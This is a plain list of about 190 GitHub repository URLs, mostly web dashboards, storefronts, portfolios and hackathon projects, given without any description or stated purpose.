    https://github.com/FSDTeam-SAA/Igghy-dashboard
    https://github.com/FlowBondTech/danz-miniapps
    https://github.com/BrennansWave-com/brennanswave
    https://github.com/FlowBondTech/danz-web
    https://github.com/QualifyAI/qualify-frontend
    https://github.com/FSDTeam-SAA/ftfdesignco-backend
    https://github.com/Gamage-Recruiters-406/Rent_a_Car
    https://github.com/Umbrelabs-Projects/Procobiz
    https://github.com/The-Extra-Project/Extra_surface_repo
    https://github.com/Automobile-System/frontend
    https://github.com/VplayProCrypto/mvp_vercel
    https://github.com/sparktechagency/nskustoms_custom_game_site-2.0
    https://github.com/softvence-omega-future-stack/gameluke-frontend
    https://github.com/NexumTechnologies/E-Commerce
    https://github.com/Umbrelabs-Projects/Hostella-superAdmin
    https://github.com/FSDTeam-SAA/admin-dashboard-gman
    https://github.com/sparktechagency/protippz_website
    https://github.com/FlowRMS/flow-connect-frontend-new
    https://github.com/Anthem-InfoTech-Pvt-Ltd/dashboards
    https://github.com/WeOwnAiAgents-Hackerhouse/WeOwnAiAgent
    https://github.com/Karigar-App/Karigar
    https://github.com/sparktechagency/silicon-zisan-website
    https://github.com/FSDTeam-SAA/hinkel-Website
    https://github.com/FSDTeam-SAA/iwmsadvisors
    https://github.com/Umbrelabs-Projects/Hostella-admin
    https://github.com/Umbrelabs-Projects/Hostella-stu
    https://github.com/iwb25-412-vertex-prime/apigateway-v1
    https://github.com/Cloudrika/cloudrika-web
    https://github.com/sparktechagency/consult_dashboard
    https://github.com/sparktechagency/jonowoods-website
    https://github.com/Softvence-Omega-Dev-Ninjas/diaz-jupiter-marine-frontend
    https://github.com/sparktechagency/profitable-website-v2
    https://github.com/musetax/Amus-fe
    https://github.com/sparktechagency/faceAi-front-end
    https://github.com/sparktechagency/any-job-dashboard
    https://github.com/sparktechagency/anyjob-web
    https://github.com/softvence-omega-future-stack/lawalx_frontend
    https://github.com/softvence-omega-future-stack/kilian-rodhe-last-
    https://github.com/WeOwnNetwork/EthDenver-submission
    https://github.com/sparktechagency/betopia-website
    https://github.com/FlowRMSLabs/flowdemandwebsite
    https://github.com/BhavikPatel-dreamz/wove-gift-portal
    https://github.com/BhavikPatel-dreamz/DynamicDreamz-AIagent-Demos
    https://github.com/GARAGE-POS/nextjs_test
    https://github.com/BhavikPatel-dreamz/Homeopathway
    https://github.com/digitalschool-tech/tech-static
    https://github.com/tricodenetwork/lock-up
    https://github.com/Sahl-AI/sahl-ai-iframe
    https://github.com/dawahanigeria-team/domainping
    https://github.com/shahid538org/microrealestate
    https://github.com/orynth-dev/vite-shadcn-template
    https://github.com/FlowBondTech/egator
    https://github.com/sparktechagency/u_tee_hub
    https://github.com/Enigma-Incorporated-Ltd/N0DE-Website
    https://github.com/FSDTeam-SAA/AMES_Investment_new
    https://github.com/Frontier-tech-consulting/olas-mcp-application-workflow
    https://github.com/Softvence-Omega-Dev-Ninjas/vic_pec_server_app
    https://github.com/Softvence-Omega-Dev-Ninjas/jdadzok_server
    https://github.com/Binary-Mindz/agimtula_server
    https://github.com/Softvence-Omega-Dev-Ninjas/alvaaro-server
    https://github.com/Softvence-Omega-Cyber-Monk/nishant-server
    https://github.com/softvence-omega-future-stack/huss-be
    https://github.com/BhavikPatel-dreamz/Products-filters-react
    https://github.com/Victorola-coder/tewo
    https://github.com/Atik203/Scholar-Flow
    https://github.com/Kreliannn/Document-Request-System-FRONTEND
    https://github.com/coderkhalide/Anti-Detect-Browser
    https://github.com/WeerasingheMSC/ASMS_Frontend
    https://github.com/fsdteam8/n_Krypted-frontend
    https://github.com/tanushbhootra576/Bionary-Website-Challenge-and-final
    https://github.com/Kreliannn/PDF-To-Reviewer-Quiz-FRONTEND
    https://github.com/tanushbhootra576/collegeConnect
    https://github.com/brown2020/ikigaifinder
    https://github.com/Kreliannn/commision_portfolio
    https://github.com/coderkhalide/Trading-Journal
    https://github.com/tanushbhootra576/weather
    https://github.com/Kreliannn/student-passed-rate-analysis-frontend
    https://github.com/Kreliannn/pharmacy-management-frontend
    https://github.com/Kreliannn/Employee-management-frontend
    https://github.com/Kreliannn/e-commerce-frontend
    https://github.com/umarabid123/The_INTERNET_OF_AGENTS_HACKATHON
    https://github.com/ahmadraza382/FinanceAi
    https://github.com/tanushbhootra576/turbo-happiness
    https://github.com/shaheeer-dev/sketchers
    https://github.com/tanushbhootra576/game
    https://github.com/tanushbhootra576/GridSaga
    https://github.com/senulahesara/devkit
    https://github.com/tanushbhootra576/week3-forms-and-inputs
    https://github.com/tanushbhootra576/PW-app
    https://github.com/tanushbhootra576/RESTRO
    https://github.com/tanushbhootra576/MoodSync
    https://github.com/Amanbanti/Capstone
    https://github.com/ShifaLabs/shifa
    https://github.com/SouravDn-p/mobile-canvas-nextjs
    https://github.com/RinSanom/IoTWeb
    https://github.com/kanchana404/Google-bussiness-api-Get-reviews-and-Reply-reviews
    https://github.com/Salman1205/MailAssist
    https://github.com/Yassin-Younis/bypass-in-app-browser
    https://github.com/Lithira-Silva/TrueClaim---ITPM-
    https://github.com/maaz-bin-hassan/sahoolat-web-new
    https://github.com/Pramadu2001/ITPM_MODUS
    https://github.com/abimtad/upload_file
    https://github.com/anilgoswamistartbitsolutions/travel-platform
    https://github.com/AhsanalyOfficial/ahsan_portfolio
    https://github.com/HevenDev/rmw-new-design
    https://github.com/anilgoswamistartbitsolutions/travel-payload-sites
    https://github.com/dhruvmalik007/solana-colossum-hackathon
    https://github.com/Tiewasters99/AI_Law_Wizard
    https://github.com/coderkhalide/scalping-trading-tools
    https://github.com/monazahmed/Agrismart-project-
    https://github.com/Gowreesh-VT/SherlockIT
    https://github.com/webprogramminghack/b3-practice-30
    https://github.com/Salman1205/Mail-Assist-CRM
    https://github.com/AbdulwahidHusein/Shipper-chat
    https://github.com/michelzappy/zappy-scratch-091225
    https://github.com/Ali-Hamas/Learn_Hub
    https://github.com/VALENSAPP/coin_backend
    https://github.com/QaisarWaheed/Aluminum-POS
    https://github.com/Abdulbasit219/UPSkaleAI
    https://github.com/Satyam3002/nextauth
    https://github.com/ahmadraza382/Hospital-management-system
    https://github.com/AKDebug-UX/challengePR
    https://github.com/Ruwanima/ella-south-star-frontend
    https://github.com/ahmadraza382/Luxeurs-Shopping-Store
    https://github.com/ahmadraza382/Portfolio
    https://github.com/Ayesha-Siddiqui1234/katy-youth-hackathon-2025-dev-post-
    https://github.com/WimpyvL/Zappy-Health-Dashboard
    https://github.com/ifedolapoomoniyi/fleet-robotics
    https://github.com/muhammad-tahir-sultan/rehman-fyp-nextjs-multivendor
    https://github.com/vkrms/wizard
    https://github.com/Atik203/VocabPrep
    https://github.com/web-ghoul/Portfolio
    https://github.com/AbdulwahidHusein/ai-tools-directory
    https://github.com/AhmadRazaKhokhar1/resturants-app
    https://github.com/ishivamgaur/Ap-news-next-js
    https://github.com/amMubbasher/cleannami.ceenami-old
    https://github.com/AbdulwahidHusein/crawler-dashboard
    https://github.com/SouravDn-p/RexAuction
    https://github.com/AKDebug-UX/interactive-tv-app
    https://github.com/usman-174/VidSpark
    https://github.com/NatyJoseDie/proyecto-nginx
    https://github.com/AKDebug-UX/DoneWithIt
    https://github.com/dhruvmalik007/forensics-board
    https://github.com/Rahulkumarhavit/ProStore-Ecommerce
    https://github.com/Bart3kL/shopify-components
    https://github.com/mjatin-dev/logic-zephyr
    https://github.com/umrasghar/heygen-demo
    https://github.com/thanhdanh111/challenge
    https://github.com/hamza-nafasat/rentin-frontend
    https://github.com/rejoan121615/ClientOps
    https://github.com/SouravDn-p/CMR
    https://github.com/EmanDeveloper/EasyTech
    https://github.com/addis-ale/25-5-clock
    https://github.com/MSCPerera/Job-Board-App
    https://github.com/Nathanim1919/nextjs-project
    https://github.com/TimothyBabatu13/AegisHealth-Smart
    https://github.com/Senti-fi/Senti.fi
    https://github.com/Zentaurios/stable-monitor
    https://github.com/SouravDn-p/Frontend-task
    https://github.com/Storaboy11/meerge
    https://github.com/ahmedghonim/esraa
    https://github.com/vrunda310/AIA-VEGA-Frontend
    https://github.com/emmanueldavidson96/popular_saas_product_landing_page
    https://github.com/pratikp72/deal-Project
    https://github.com/Al-amin07/file_sure
    https://github.com/waris-ansar/finstar
    https://github.com/MianHaziq/LKnight-Lms
    https://github.com/pankajkhadse/TrustBasket
    https://github.com/adnaan-2/content-generation
    https://github.com/malikjunaidhassann/seller-panel
    https://github.com/mdnuruzzamannirob/your-capture-awards-dashboard
    https://github.com/Minahil48/NY-caffine
    https://github.com/FrazKhan1/dev-team-chat
    https://github.com/jrioscloud/financial-document-analyzer
    https://github.com/seemab-ahmed/rodopi
    https://github.com/JudeTejada/digital-pods
    https://github.com/msuhels/RapidProject-Pos-System
    https://github.com/Al-amin07/project_5_frontend
    https://github.com/abdullah2310ishaq/afronaut
    https://github.com/Jaskaran2701/Test-1
    https://github.com/Deepanshu7-bit/nugen-interns
    https://github.com/saifullah-max/bublr
    https://github.com/Meet2054/automa8x-production-new